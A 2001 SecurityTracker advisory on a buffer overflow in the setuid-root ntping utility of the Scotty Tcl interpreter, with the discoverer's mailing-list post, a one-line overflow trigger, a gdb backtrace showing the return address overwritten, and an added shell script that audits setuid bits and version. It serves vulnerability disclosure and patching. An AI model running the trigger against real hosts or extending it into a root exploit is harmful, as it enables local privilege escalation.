Scotty Tcl Interpreter's ntping Utility Lets Local Users Obtain Root Privileges
SecurityTracker Alert ID: 1001770
SecurityTracker URL: http://securitytracker.com/id/1001770
CVE Reference: GENERIC-MAP-NOMATCH
Date: Jun 17 2001
Impact:
Execution of arbitrary code via local system, Root access via local system
Fix Available: Yes
Vendor Confirmed: Yes
Exploit Included: Yes
Version(s): prior to 2.1.11
Description:
A vulnerability has been discovered in Scotty, a Tcl interpreter for network management applications. The security hole exists in the ntping utility and allows local users to execute arbitrary code and gain root-level privileges on the host.
The following command will reportedly trigger the buffer overflow vulnerability:
[root@linux d0tslash]# /usr/bin/ntping `perl -e 'print "A" x 9000'`
Segmentation fault (core dumped)
Because ntping is installed with set-user-id and set-group-id 'root' privileges, this buffer overflow can allow a local user to execute code with an effective user id of 'root'.
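An added example, written for this entry and not taken from the advisory or from the Scotty distribution: a POSIX shell audit that reports whether the two setuid helpers named on this page are installed setuid or setgid and whether a caller-supplied Scotty version predates the fixed release 2.1.11. The helper paths are assumed from the SuSE file listing quoted in the follow-up message.

```sh
#!/bin/sh
# Added audit helper, not code from the advisory or the Scotty project.
# Assumptions: helper paths come from the SuSE listing quoted on this page;
# the caller supplies the installed Scotty version; 2.1.11 is the fixed release.
FIXED_VERSION="2.1.11"
HELPERS="/usr/bin/ntping /usr/bin/straps"

# Return 0 when numeric dotted version $1 sorts before FIXED_VERSION.
# Fields compare numerically, so 2.1.9 counts as older than 2.1.11.
scotty_version_vulnerable() {
    have="$1"
    set -- $(printf '%s\n' "$have" | tr '.' ' ')
    a1=${1:-0}; a2=${2:-0}; a3=${3:-0}
    set -- $(printf '%s\n' "$FIXED_VERSION" | tr '.' ' ')
    b1=${1:-0}; b2=${2:-0}; b3=${3:-0}
    if [ "$a1" -ne "$b1" ]; then [ "$a1" -lt "$b1" ] && return 0; return 1; fi
    if [ "$a2" -ne "$b2" ]; then [ "$a2" -lt "$b2" ] && return 0; return 1; fi
    [ "$a3" -lt "$b3" ] && return 0
    return 1
}

# Return 0 when file $1 carries the setuid or setgid bit (the installation
# state the advisory relies on); print a one-line report in every case.
audit_setuid_helper() {
    [ -e "$1" ] || { echo "absent    $1"; return 1; }
    if [ -u "$1" ] || [ -g "$1" ]; then
        echo "suid/sgid $(ls -ln "$1")"
        return 0
    fi
    echo "ok        $1"
    return 1
}

# Report on both helpers; $1 (optional) is the installed Scotty version.
run_audit() {
    for f in $HELPERS; do
        audit_setuid_helper "$f" || :
    done
    if [ -n "${1:-}" ]; then
        if scotty_version_vulnerable "$1"; then
            echo "Scotty $1 predates $FIXED_VERSION: upgrade before leaving the helpers setuid"
        else
            echo "Scotty $1 is at or past the fixed release $FIXED_VERSION"
        fi
    fi
}

run_audit "$@"
```

Run it as `sh audit.sh 2.1.10` on a host with Scotty installed; the version argument is optional and only drives the second half of the report.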
Impact:
A local user can execute arbitrary code and gain root level privileges on the host.
Solution:
The vendor has released a fix (scotty 2.1.11).
Vendor URL: wwwhome.cs.utwente.nl/~schoenw/scotty/
Cause:
Boundary error
Underlying OS:
Linux (Any), UNIX (Any)
Message History:
This archive entry has one or more follow-up message(s) listed below.
Source Message Contents
Date: Sun, 17 Jun 2001 10:05:07 -0400
Subject: suid scotty (ntping) overflow
I am not sure that this made it on to the list the first time I sent it... so sorry if this is a duplicate
[root@linux d0tslash]# /usr/bin/ntping `perl -e 'print "A" x 9000'`
Segmentation fault (core dumped)
Vendor: http://wwwhome.cs.utwente.nl/~schoenw/scotty/
What led me to research this:
arndt@aorta.tat.physik.uni-tuebingen.de (Michael Arndt) wrote:
> i run scotty-testsuite: what must i change on my system:(Linux
> slackware):
> ==== Test generated error:
> can not connect straps socket: Permission denied
straps and ntping must be installed suid root.
^------- Hrmm I sure thought that was interesting to know *grin*
Vendors affected:
unknown by the author of this document
just a note I found however...
<19990702221232.79B119410@Galois.suse.de>
Hi folks,
here is the long promised posting of all suid/sgid files on an alpha of SuSE Linux 6.2 ... comments on wrong permissions are welcome.
Please note that SuSE has got 5 full CD-Roms so that's the reason for the many many files ... (and too much suid/sgid ones ...)
...
-rwsr-xr-x 1 root root 33370 Jun 30 11:11 ./usr/bin/ntping
-rwsr-xr-x 1 root root 18352 Jun 30 11:11 ./usr/bin/straps
...
[root@linux d0tslash]# gdb /usr/bin/ntping core
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
This GDB was configured as "i386-mandrake-linux"...
(no debugging symbols found)...
Core was generated by `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libnsl.so.1...(no debugging symbols found)...done.
Loaded symbols for /lib/libnsl.so.1
Reading symbols from /lib/libresolv.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/libresolv.so.2
Reading symbols from /lib/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/libnss_files.so.2...done.
Loaded symbols for /lib/libnss_files.so.2
#0 0x40079b66 in getenv () from /lib/libc.so.6
(gdb) bt
#0 0x40079b66 in getenv () from /lib/libc.so.6
#1 0x4013aadb in inet_nsap_ntoa () from /lib/libc.so.6
#2 0x4013b9de in __res_ninit () from /lib/libc.so.6
#3 0x4013eb69 in __nss_hostname_digits_dots () from /lib/libc.so.6
#4 0x4013ff5f in gethostbyname () from /lib/libc.so.6
#5 0x080495b8 in _start ()
#6 0x41414141 in ?? ()
Cannot access memory at address 0x41414141
-KF